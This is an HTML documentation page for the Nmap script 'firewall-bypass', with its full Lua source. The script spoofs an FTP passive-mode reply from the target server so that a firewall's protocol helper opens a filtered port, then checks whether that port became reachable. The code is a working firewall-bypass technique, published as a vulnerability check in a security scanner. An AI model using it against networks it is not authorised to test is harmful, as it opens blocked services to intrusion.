<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File firewall-bypass</h3>
<b>Script types:</b> hostrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Hani Benhabiles<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://nmap.org/nsedoc/scripts/firewall-bypass.html">https://nmap.org/nsedoc/scripts/firewall-bypass.html</a><br/>
<h3>Summary</h3>
<p>Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.</p>
<p>The script works by spoofing a packet from the target server asking for opening a related connection to a target port which will be fulfilled by the firewall through the adequate protocol helper port. The attacking machine should be on the same network segment as the firewall for this to work. The script supports ftp helper on both IPv4 and IPv6. Real path filter is used to prevent such attacks.</p>
<p>Based on work done by Eric Leblond.</p>
<p>For more information, see:</p>
<ul>
<li><a href="http://home.regit.org/2012/03/playing-with-network-layers-to-bypass-firewalls-filtering-policy/" targte=_blank>http://home.regit.org/2012/03/playing-with-network-layers-to-bypass-firewalls-filtering-policy/</a></p>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>firewall-bypass.helper:</td><td></td></tr>
<tr><td>firewall-bypass.targetport:</td><td></td></tr>
<tr><td>firewall-bypass.helperport:</td><td></td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script firewall-bypass &lt;target&gt;
nmap --script firewall-bypass --script-args firewall-bypass.helper=&quot;ftp&quot;, firewall-bypass.targetport=22 &lt;target&gt;</pre>
<h3>Output</h3>
<pre>Host script results:
| firewall-bypass:
|_  Firewall vulnerable to bypass through ftp helper. (IPv4)</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/packet.htm">packet</a></li>
</ul>
<h3>Code</h3>
<pre>local nmap = require &quot;nmap&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local packet = require &quot;packet&quot;

description = [[
Detects a vulnerability in netfilter and other firewalls that use helpers to
dynamically open ports for protocols such as ftp and sip.

The script works by spoofing a packet from the target server asking for opening
a related connection to a target port which will be fulfilled by the firewall
through the adequate protocol helper port. The attacking machine should be on
the same network segment as the firewall for this to work. The script supports
ftp helper on both IPv4 and IPv6. Real path filter is used to prevent such
attacks.

Based on work done by Eric Leblond.

For more information, see:

* http://home.regit.org/2012/03/playing-with-network-layers-to-bypass-firewalls-filtering-policy/
]]

---
-- @args firewall-bypass.helper The helper to use. Defaults to &lt;code&gt;ftp&lt;/code&gt;.
-- Supported helpers: ftp (Both IPv4 and IPv6).
--
-- @args firewall-bypass.helperport If not using the helper&#39;s default port.
--
-- @args firewall-bypass.targetport Port to test vulnerability on. Target port should be a
-- non-open port. If not given, the script will try to find a filtered or closed port from
-- the port scan results.
--
-- @usage
-- nmap --script firewall-bypass &lt;target&gt;
-- nmap --script firewall-bypass --script-args firewall-bypass.helper=&quot;ftp&quot;, firewall-bypass.targetport=22 &lt;target&gt;
--
-- @output
-- Host script results:
-- | firewall-bypass:
-- |_  Firewall vulnerable to bypass through ftp helper. (IPv4)

author = &quot;Hani Benhabiles&quot;

license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;

categories = {&quot;vuln&quot;, &quot;intrusive&quot;}

ftp_helper = {
  should_run = function(host, helperport)
    local helperport = helperport or 21
    -- IPv4 and IPv6 are supported
    if nmap.address_family() ~= &#39;inet&#39; and nmap.address_family() ~= &#39;inet6&#39; then
      return false
    end

    -- Test if helper port is open
    local testsock = nmap.new_socket()
    testsock:set_timeout(1000)
    local status, _ = testsock:connect(host.ip, helperport)
    testsock:close()
    if not status then
      stdnse.debug1(&quot;Unable to connect to %s helper port.&quot;, helperport)
      return false
    end
    return true
  end,

  attack = function(host, helperport, targetport)
    local ethertype, payload
    local isIp4 = nmap.address_family() == &#39;inet&#39; -- True if we are using IPv4. Otherwise, it is IPv6

    if isIp4 then
      -- IPv4 payload
      payload = &quot;227 Entering Passive Mode (&quot; ..
      string.gsub(host.ip,&quot;%.&quot;,&quot;,&quot;) .. &quot;,&quot; ..
      ((targetport &gt;&gt; 8) &amp; 0xff) ..
      &quot;,&quot; .. (targetport &amp; 0xff) ..
      &quot;)\r\n&quot;
      ethertype = &quot;\x08\0&quot; -- Ethernet Type: IPv4

    else
      -- IPv6 payload
      payload = &quot;229 Extended Passive Mode OK (|||&quot; .. targetport .. &quot;|)\r\n&quot;
      ethertype = &quot;\x86\xdd&quot; -- Ethernet Type: IPv6
    end

    helperport = helperport or 21
    local function spoof_ftp_packet(host, helperport, targetport)
      -- Sniffs the network for src host host.ip and src port helperport
      local filter = &quot;src host &quot; .. host.ip .. &quot; and tcp src port &quot; .. helperport
      local status, l2data, l3data
      local timeout = 1000
      local start = nmap.clock_ms()

      -- Start sniffing
      local sniffer = nmap.new_socket()
      sniffer:set_timeout(100)
      sniffer:pcap_open(host.interface, 256, true, filter)

      -- Until we get adequate packet
      while (nmap.clock_ms() - start) &lt; timeout do
        local _
        status, _, l2data, l3data = sniffer:pcap_receive()
        if status and string.find(l3data, &quot;220 &quot;) then
          break
        end
      end
      if not status then
        stdnse.debug1(&quot;pcap read timed out&quot;)
        return false
      end

      -- Get ethernet values
      local f = packet.Frame:new(l2data)
      f:ether_parse()

      local p = packet.Packet:new(l3data, #l3data)
      if isIp4 then
        if not p:ip_parse() then
          -- An error happened
          stdnse.debug1(&quot;Couldn&#39;t parse IPv4 sniffed packet.&quot;)
          sniffer:pcap_close()
          return false
        end
      else
        if not p:ip6_parse() then
          -- An error happened
          stdnse.debug1(&quot;Couldn&#39;t parse IPv6 sniffed packet.&quot;)
          sniffer:pcap_close()
          return false
        end
      end

      -- Spoof packet
      -- 1. Invert ethernet addresses
      f.frame_buf = f.mac_src .. f.mac_dst .. ethertype

      -- 2. Modify packet payload
      p.buf = string.sub(p.buf, 1, p.tcp_data_offset) ..  payload
      -- 3. Increment IP ID field (IPv4 packets)
      if isIp4 then
        p:ip_set_id(p.ip_id + 1)
      end

      -- 4. Set TCP sequence number correctly using traffic data
      p:tcp_set_seq(p.tcp_seq + p.tcp_data_length)

      -- 5. Update all checksums and lengths
      if isIp4 then
        -- Packet length field
        p:ip_set_len(#p.buf)
        p:ip_count_checksum()
      else
        -- Payload length field
        p:ip6_set_plen(#p.buf - p.tcp_offset)
      end
      p:tcp_count_checksum()

      -- and finally, we send it.
      local dnet = nmap.new_dnet()
      dnet:ethernet_open(host.interface)
      dnet:ethernet_send(f.frame_buf .. p.buf)
      status = sniffer:pcap_receive()
      dnet:ethernet_close()
      return true
    end

    local co = stdnse.new_thread(spoof_ftp_packet, host, helperport, targetport)

    -- Wait for packet spoofing thread
    stdnse.sleep(1)
    -- Make connection to the target while packet the spoofing thread is sniffing for packets
    local socket = nmap.new_socket()
    socket:set_timeout(3000)
    local status, _ = socket:connect(host.ip, helperport)
    if not status then
      -- Problem connecting to helper port
      stdnse.debug1(&quot;Problem connecting to helper port %s.&quot;, tostring(helperport))
      return
    end

    -- wait packet spoofing thread to finish
    stdnse.sleep(1.5)
    socket:close()
    return
  end,
}

-- List of helpers
local helpers = {
  ftp = ftp_helper, -- FTP (IPv4 and IPv6)
}

local helper

hostrule = function(host)
  helper = stdnse.get_script_args(SCRIPT_NAME .. &quot;.helper&quot;)

  if not nmap.is_privileged() then
    nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}
    if not nmap.registry[SCRIPT_NAME].rootfail then
      stdnse.verbose1(&quot;lacks privileges.&quot; )
      nmap.registry[SCRIPT_NAME].rootfail = true
    end
    return false
  end

  if not host.interface then
    return false
  end

  if helper and not helpers[helper] then
    stdnse.debug1(&quot;%s helper not supported at the moment.&quot;, helper)
    return false
  end

  return true
end

action = function(host, port)
  local helperport = tonumber(stdnse.get_script_args(SCRIPT_NAME .. &quot;.helperport&quot;))
  local targetport = tonumber(stdnse.get_script_args(SCRIPT_NAME .. &quot;.targetport&quot;))
  local helpername

  if targetport then
    -- We should check if target port is not already open
    local testsock = nmap.new_socket()
    testsock:set_timeout(1000)
    local status, _ = testsock:connect(host.ip, targetport)
    if status then
      stdnse.debug1(&quot;%s target port already open.&quot;, targetport)
      return nil
    end
    testsock:close()
  else
    -- If not target port specified, we try to get a filtered port,
    -- which would be more likely blocked by a firewall before looking for a closed one.
    local port = nmap.get_ports(host, nil, &quot;tcp&quot;, &quot;filtered&quot;) or nmap.get_ports(host, nil, &quot;tcp&quot;, &quot;closed&quot;)
    if port then
      targetport = port.number
      stdnse.debug1(&quot;%s chosen as target port.&quot;, targetport)
    else
      -- No closed or filtered ports to check on.
      stdnse.debug1(&quot;Target port not specified and no closed or filtered port found.&quot;)
      return
    end
  end
  -- If helper chosen by user
  if helper then
    if helpers[helper].should_run(host, helperport) then
      helpers[helper].attack(host, helperport, targetport)
    else
      return
    end
    -- If no helper chosen manually, we iterate over table to find a suitable one.
  else
    for i, helper in pairs(helpers) do
      if helper.should_run(host, helperport) then
        helpername = i
        stdnse.debug1(&quot;%s chosen as helper.&quot;, helpername)
        helper.attack(host, helperport, targetport)
        break
      end
    end
    if not helpername then
      stdnse.debug1(&quot;no suitable helper found.&quot;)
      return nil
    end
  end

  -- Then we check if target port is now open.
  local testsock = nmap.new_socket()
  testsock:set_timeout(1000)
  local status, _ = testsock:connect(host.ip, targetport)
  testsock:close()
  if status then
    -- If we could connect, then port is open and firewall is vulnerable.
    local vulnstring = &quot;Firewall vulnerable to bypass through &quot; .. (helper or helpername) .. &quot; helper. &quot;
    .. (nmap.address_family() == &#39;inet&#39; and &quot;(IPv4)&quot; or &quot;(IPv6)&quot;)

    return stdnse.format_output(true, vulnstring)
  end
end</pre>
